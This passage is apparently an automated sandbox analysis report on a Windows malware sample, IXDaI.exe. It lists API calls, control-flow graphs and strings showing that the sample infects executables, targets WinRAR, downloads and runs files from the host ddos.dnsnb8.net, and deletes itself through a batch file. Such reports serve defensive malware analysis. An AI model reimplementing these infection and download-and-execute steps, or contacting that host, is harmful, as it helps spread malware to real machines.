                                                                                      • __aulldiv.LIBCMT ref: 00EE1796
                                                                                      • __aulldiv.LIBCMT ref: 00EE17A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: TimeValue__aulldiv$FileSystem
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SOFTWARE\GTplus$Time
                                                                                      • API String ID: 541852442-4280275245
                                                                                      • Opcode ID: cdaf66461c97888a21515402173682d18ff39704e7749c9229ac0fb9353ffb25
                                                                                      • Instruction ID: b581d372a2dae4134cd3692f387735b736586778a6ce5145a44a66fd0a4565c8
                                                                                      • Opcode Fuzzy Hash: cdaf66461c97888a21515402173682d18ff39704e7749c9229ac0fb9353ffb25
                                                                                      • Instruction Fuzzy Hash: 6A116675A0024DBBDB109AA6CCC9FEF7BBCEB45B14F109155FA10B7140D6719A848B60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 ee1e6e-ee1e95 call ee2d60 3 ee1e9c-ee1eaa call ee1df6 0->3 4 ee1e97 call ee1d8a 0->4 8 ee2332 3->8 9 ee1eb0-ee1ed9 SetFileAttributesA CreateFileA 3->9 4->3 11 ee2338-ee233b 8->11 9->8 10 ee1edf-ee1f28 call ee1915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 20 ee1f2e-ee1f39 10->20 13 ee233d-ee2340 UnmapViewOfFile 11->13 14 ee2346-ee2349 11->14 13->14 16 ee234b-ee234e CloseHandle 14->16 17 ee2350-ee2354 14->17 16->17 18 ee2356-ee235b CloseHandle 17->18 19 ee2391-ee239a call ee2d9b 17->19 18->19 20->8 22 ee1f3f-ee1f56 20->22 22->8 24 ee1f5c-ee1f64 22->24 24->8 25 ee1f6a-ee1f70 24->25 25->8 26 ee1f76-ee1f87 call ee1c81 25->26 26->8 29 ee1f8d-ee1fa7 call ee185b call ee1c81 26->29 29->8 34 ee1fad-ee1fb4 29->34 35 ee1fb6-ee1fc5 call ee1af9 34->35 36 ee2024-ee2045 34->36 35->36 44 ee1fc7-ee1fd2 35->44 36->8 37 ee204b-ee204e 36->37 39 ee2070-ee20f4 call ee1af9 * 2 call ee1c68 * 2 memset * 2 37->39 40 ee2050-ee2053 37->40 62 ee20f5-ee20fe 39->62 42 ee2056-ee205a 40->42 42->39 45 ee205c-ee2061 42->45 44->8 47 ee1fd8-ee1fe7 44->47 45->8 48 ee2067-ee206e 45->48 50 ee1fef-ee2006 call ee1af9 47->50 51 ee1fe9-ee1fec 47->51 48->42 57 ee2008-ee200e call ee1c68 50->57 58 ee2013-ee201e FlushViewOfFile 50->58 51->50 57->58 58->36 63 ee2130-ee2139 62->63 64 ee2100-ee2114 62->64 67 ee213c-ee2142 63->67 65 ee212d-ee212e 64->65 66 ee2116-ee212a 64->66 65->62 66->65 68 ee215c 67->68 69 ee2144-ee2150 67->69 72 ee215f-ee2162 68->72 70 ee2157-ee215a 69->70 71 ee2152-ee2154 69->71 70->67 71->70 73 ee2164-ee2171 72->73 74 ee2181-ee2184 72->74 77 ee232a-ee232d 73->77 78 ee2177-ee217e 73->78 75 ee218d-ee21ba call ee1c68 74->75 76 ee2186 74->76 81 ee21bc-ee21d0 call ee1c68 75->81 82 ee21d3-ee220b call ee1c81 call ee1c68 75->82 76->75 77->72 78->74 81->82 89 ee220d-ee2218 call ee1c68 82->89 90 ee221b-ee221e 82->90 89->90 91 ee2226-ee2328 memcpy UnmapViewOfFile CloseHandle call ee1b8a call ee185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call ee1915 CloseHandle 90->91 92 ee2220-ee2223 90->92 91->11 92->91
                                                                                      APIs
                                                                                      • SetFileAttributesA.KERNELBASE(?,00000080,?,00EE32B0,00000164,00EE2986,?), ref: 00EE1EB9
                                                                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00EE1ECD
                                                                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00EE1EF3
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00EE1F07
                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00EE1F1D
                                                                                      • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00EE201E
                                                                                      • memset.MSVCRT ref: 00EE20D8
                                                                                      • memset.MSVCRT ref: 00EE20EA
                                                                                      • memcpy.MSVCRT ref: 00EE222D
                                                                                      • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE2238
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE224A
                                                                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22C6
                                                                                      • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22CB
                                                                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22DD
                                                                                      • WriteFile.KERNEL32(000000FF,00EE4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22F7
                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE230D
                                                                                      • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE2322
                                                                                      • UnmapViewOfFile.KERNEL32(?,?,00EE32B0,00000164,00EE2986,?), ref: 00EE2340
                                                                                      • CloseHandle.KERNEL32(?,?,00EE32B0,00000164,00EE2986,?), ref: 00EE234E
                                                                                      • CloseHandle.KERNEL32(000000FF,?,00EE32B0,00000164,00EE2986,?), ref: 00EE2359
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                                                                      • String ID: .@$5@$<@$C@$m@
                                                                                      • API String ID: 3043204753-519767493
                                                                                      • Opcode ID: f41b20e73a74f48247d611c7a9baf3bccbfa38796bf7cd749df3073fa27cc4b0
                                                                                      • Instruction ID: d677f980dfb92ca00f6af0ec2e283e7796252444ad87096c0763ae36cb9981eb
                                                                                      • Opcode Fuzzy Hash: f41b20e73a74f48247d611c7a9baf3bccbfa38796bf7cd749df3073fa27cc4b0
                                                                                      • Instruction Fuzzy Hash: F2F14A71900289EFCB24DFA6DC84AADBBB5FF08314F105569E619BB6A1D730AD81CF50

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00EE2766
                                                                                      • memset.MSVCRT ref: 00EE2774
                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00EE2787
                                                                                      • wsprintfA.USER32 ref: 00EE27AB
                                                                                        • Part of subcall function 00EE185B: GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
                                                                                        • Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1878
                                                                                        • Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1880
                                                                                        • Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1890
                                                                                        • Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1894
                                                                                      • wsprintfA.USER32 ref: 00EE27C6
                                                                                      • CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\480c1388.exe,00000000), ref: 00EE27D4
                                                                                      • wsprintfA.USER32 ref: 00EE27F4
                                                                                        • Part of subcall function 00EE1973: PathFileExistsA.KERNELBASE(\N,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1992
                                                                                        • Part of subcall function 00EE1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00EE19BA
                                                                                        • Part of subcall function 00EE1973: Sleep.KERNEL32(00000064), ref: 00EE19C6
                                                                                        • Part of subcall function 00EE1973: wsprintfA.USER32 ref: 00EE19EC
                                                                                        • Part of subcall function 00EE1973: CopyFileA.KERNEL32(?,?,00000000), ref: 00EE1A00
                                                                                        • Part of subcall function 00EE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE1A1E
                                                                                        • Part of subcall function 00EE1973: GetFileSize.KERNEL32(?,00000000), ref: 00EE1A2C
                                                                                        • Part of subcall function 00EE1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00EE1A46
                                                                                        • Part of subcall function 00EE1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00EE1A65
                                                                                      • DeleteFileA.KERNEL32(?,?,00EE4E54,00EE4E58), ref: 00EE281A
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00EE4E54,00EE4E58), ref: 00EE2832
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                      • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\480c1388.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                      • API String ID: 692489704-3489375098
                                                                                      • Opcode ID: 0aa9f27ef53cd5fea6a0c3d778af8a5d3d155bc9c232eebe1e8fe2d619aa571e
                                                                                      • Instruction ID: 366ed7e243d1b3336ee77d606bc1258a43492c4fcc206f2662c44022dd8c39d9
                                                                                      • Opcode Fuzzy Hash: 0aa9f27ef53cd5fea6a0c3d778af8a5d3d155bc9c232eebe1e8fe2d619aa571e
                                                                                      • Instruction Fuzzy Hash: 732141B6D4039C7BDB10EBB69C89EEB73ACEB04744F0015A5B645F3091E6709F488AA0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 126 ee1973-ee199a PathFileExistsA 127 ee1ac7-ee1acc 126->127 128 ee19a0-ee19aa 126->128 129 ee1ace 127->129 130 ee1ad0-ee1ad5 127->130 131 ee19af-ee19c2 CreateFileA 128->131 129->130 132 ee1ad7-ee1ad9 130->132 133 ee1af0-ee1af6 130->133 134 ee1a28-ee1a36 GetFileSize 131->134 135 ee19c4-ee19d3 Sleep 131->135 132->133 136 ee1a38-ee1a3b 134->136 137 ee1a87-ee1a8b 134->137 135->131 138 ee19d5-ee1a0b call ee185b wsprintfA CopyFileA 135->138 136->137 139 ee1a3d-ee1a51 VirtualAlloc 136->139 140 ee1a8d-ee1a90 FindCloseChangeNotification 137->140 141 ee1a96-ee1a9a 137->141 138->134 152 ee1a0d-ee1a26 CreateFileA 138->152 139->137 143 ee1a53-ee1a57 139->143 140->141 144 ee1a9c 141->144 145 ee1aad-ee1ab1 141->145 147 ee1a59-ee1a6d ReadFile 143->147 148 ee1a80 143->148 149 ee1aa0-ee1aa7 DeleteFileA 144->149 150 ee1adb-ee1ae0 145->150 151 ee1ab3-ee1ab6 145->151 147->137 153 ee1a6f-ee1a7e 147->153 148->137 149->145 154 ee1ae7-ee1aec 150->154 155 ee1ae2-ee1ae5 150->155 151->127 156 ee1ab8-ee1ac1 VirtualFree 151->156 152->134 157 ee1a9e 152->157 153->147 153->148 154->133 158 ee1aee 154->158 155->154 156->127 157->149 158->133
                                                                                      APIs
                                                                                      • PathFileExistsA.KERNELBASE(\N,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1992
                                                                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00EE19BA
                                                                                      • Sleep.KERNEL32(00000064), ref: 00EE19C6
                                                                                      • wsprintfA.USER32 ref: 00EE19EC
                                                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 00EE1A00
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE1A1E
                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 00EE1A2C
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00EE1A46
                                                                                      • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00EE1A65
                                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00EE1A90
                                                                                      • DeleteFileA.KERNEL32(?), ref: 00EE1AA7
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EE1AC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                                                      • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$\N
                                                                                      • API String ID: 2523042076-3455619898
                                                                                      • Opcode ID: c279f5f8bb882326a376666801426f17644e6394e762ac6fab2da16ebd6cd2e4
                                                                                      • Instruction ID: df71413dad3f6c68019f0a15c70ffd7fbb5c74a38b362eb43f44b55e7c5692e4
                                                                                      • Opcode Fuzzy Hash: c279f5f8bb882326a376666801426f17644e6394e762ac6fab2da16ebd6cd2e4
                                                                                      • Instruction Fuzzy Hash: 3D512E7190129DAFCB109FAADCC8ABEBBB9EB04358F1055B9F519B7190D3709E84CB50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 159 ee28b8-ee28ff memset wsprintfA 160 ee29db-ee29df 159->160 161 ee2905-ee290d 159->161 161->160 162 ee2913-ee2919 161->162 163 ee291b-ee294c memset wsprintfA call ee29e2 162->163 164 ee2956-ee2965 strrchr 162->164 167 ee2951 163->167 164->160 166 ee2967-ee2978 lstrcmpiA 164->166 168 ee297a-ee2981 call ee1e6e 166->168 169 ee2988-ee2992 lstrcmpiA 166->169 167->160 172 ee2986 168->172 169->160 171 ee2994-ee299b 169->171 173 ee29ad-ee29c9 strstr 171->173 174 ee299d-ee29a3 171->174 172->160 175 ee29cb-ee29d1 call ee239d 173->175 176 ee29d3-ee29d6 call ee2692 173->176 174->173 177 ee29a5-ee29a7 lstrcpy 174->177 175->160 176->160 177->173
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00EE28D3
                                                                                      • wsprintfA.USER32 ref: 00EE28F7
                                                                                      • memset.MSVCRT ref: 00EE2925
                                                                                      • wsprintfA.USER32 ref: 00EE2940
                                                                                        • Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2A02
                                                                                        • Part of subcall function 00EE29E2: wsprintfA.USER32 ref: 00EE2A1A
                                                                                        • Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2A44
                                                                                        • Part of subcall function 00EE29E2: lstrlen.KERNEL32(?), ref: 00EE2A54
                                                                                        • Part of subcall function 00EE29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00EE2A6C
                                                                                        • Part of subcall function 00EE29E2: strrchr.MSVCRT ref: 00EE2A7C
                                                                                        • Part of subcall function 00EE29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00EE2A9F
                                                                                        • Part of subcall function 00EE29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00EE2AAE
                                                                                        • Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2AC6
                                                                                        • Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2ADA
                                                                                        • Part of subcall function 00EE29E2: FindFirstFileA.KERNELBASE(?,?), ref: 00EE2AEF
                                                                                        • Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2B13
                                                                                      • strrchr.MSVCRT ref: 00EE2959
                                                                                      • lstrcmpiA.KERNEL32(00000001,exe), ref: 00EE2974
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                      • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                                      • API String ID: 3004273771-1101464738
                                                                                      • Opcode ID: 178b37a0aca69ca68255d0f84baddf72b6c1d4e5c251ab3369de110fd7ef5a7c
                                                                                      • Instruction ID: f77ff710bb1df82f544d6aab4b34620abd8a5510bef4aad0b9cf377713ee0369
                                                                                      • Opcode Fuzzy Hash: 178b37a0aca69ca68255d0f84baddf72b6c1d4e5c251ab3369de110fd7ef5a7c
                                                                                      • Instruction Fuzzy Hash: 2C31077190038C6BDB209FB7DC89FDA33AC9B54314F04245AF685B7082E7B59AC48B60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 181 ee1099-ee10b4 182 ee10ba-ee10c7 181->182 183 ee1199-ee119c 181->183 184 ee10c8-ee10d4 182->184 185 ee10da 184->185 186 ee1184-ee1190 184->186 187 ee1113-ee1162 call ee185b wsprintfA * 2 URLDownloadToFileA 185->187 186->184 188 ee1196-ee1198 186->188 191 ee10dc-ee110d call ee1000 WinExec lstrlen 187->191 192 ee1168-ee1182 lstrlen Sleep 187->192 188->183 191->187 191->188 192->186 192->187
                                                                                      APIs
                                                                                        • Part of subcall function 00EE185B: GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
                                                                                        • Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1878
                                                                                        • Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1880
                                                                                        • Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1890
                                                                                        • Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1894
                                                                                      • WinExec.KERNEL32(?,00000005), ref: 00EE10F1
                                                                                      • lstrlen.KERNEL32(00EE4748), ref: 00EE10FA
                                                                                      • wsprintfA.USER32 ref: 00EE112A
                                                                                      • wsprintfA.USER32 ref: 00EE1143
                                                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00EE115B
                                                                                      • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00EE1169
                                                                                      • Sleep.KERNEL32 ref: 00EE1179
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                      • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                      • API String ID: 1280626985-888028667
                                                                                      • Opcode ID: 49c9de2e7478d2915d89998fc3d2f17336b8f378d85020cdbefea466796cef15
                                                                                      • Instruction ID: 945a5de1533690739d1a43bf8748ca5c8fb7a989705f8fc36540a3f5fa6123a9
                                                                                      • Opcode Fuzzy Hash: 49c9de2e7478d2915d89998fc3d2f17336b8f378d85020cdbefea466796cef15
                                                                                      • Instruction Fuzzy Hash: 23219FB19012CDBECB20DBA2DC89BAEBBBDAB05315F111099F100B7091D7745F888F60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 195 ee1581-ee15f9 call ee185b wsprintfA * 2 lstrlen CreateFileA 198 ee15fb-ee161b WriteFile CloseHandle 195->198 199 ee1633-ee1637 195->199 198->199 200 ee161d-ee162d ShellExecuteA 198->200 200->199
                                                                                      APIs
                                                                                        • Part of subcall function 00EE185B: GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
                                                                                        • Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1878
                                                                                        • Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1880
                                                                                        • Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1890
                                                                                        • Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1894
                                                                                      • wsprintfA.USER32 ref: 00EE15AA
                                                                                      • wsprintfA.USER32 ref: 00EE15C6
                                                                                      • lstrlen.KERNEL32(?), ref: 00EE15D2
                                                                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00EE15EE
                                                                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00EE1609
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EE1612
                                                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00EE162D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                      • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$open
                                                                                      • API String ID: 617340118-460878772
                                                                                      • Opcode ID: 074d77e13d93873c0660ec5e236f08dc99272f7641ec256c6f52fd5eef210db8
                                                                                      • Instruction ID: 2cd1aba8eb2bac4f002e57383124c72284772a3481f9eb7c98177706a08de49b
                                                                                      • Opcode Fuzzy Hash: 074d77e13d93873c0660ec5e236f08dc99272f7641ec256c6f52fd5eef210db8
                                                                                      • Instruction Fuzzy Hash: A911427690226C7ED72097A69C8DDEB7B6CDF59750F000091F549F3041EA709F888AA0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00EE164F
                                                                                      • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00EE165B
                                                                                      • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,00000104), ref: 00EE166E
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,00EE1099,00000000,00000000,00000000), ref: 00EE16AC
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00EE16BD
                                                                                        • Part of subcall function 00EE139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE13BC
                                                                                        • Part of subcall function 00EE139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00EE13DA
                                                                                        • Part of subcall function 00EE139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00EE1448
                                                                                      • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE16E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$C:\Windows\system32$Documents and Settings
                                                                                      • API String ID: 123563730-236263198
                                                                                      • Opcode ID: 3d83842a69ca28cbac6eaa0a0e6d24f34b9c654a0f55af7cd40b77c0cb78d93d
                                                                                      • Instruction ID: d4efaf506c673a449502ac43c6f7af10309acdb47ffd60c8f6baa2cd22685b29
                                                                                      • Opcode Fuzzy Hash: 3d83842a69ca28cbac6eaa0a0e6d24f34b9c654a0f55af7cd40b77c0cb78d93d
                                                                                      • Instruction Fuzzy Hash: 5A11B9715012DC7FCB2167B7AD8DEDB3E6DEB86765F001095F209BA0E0D6718688C7A1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
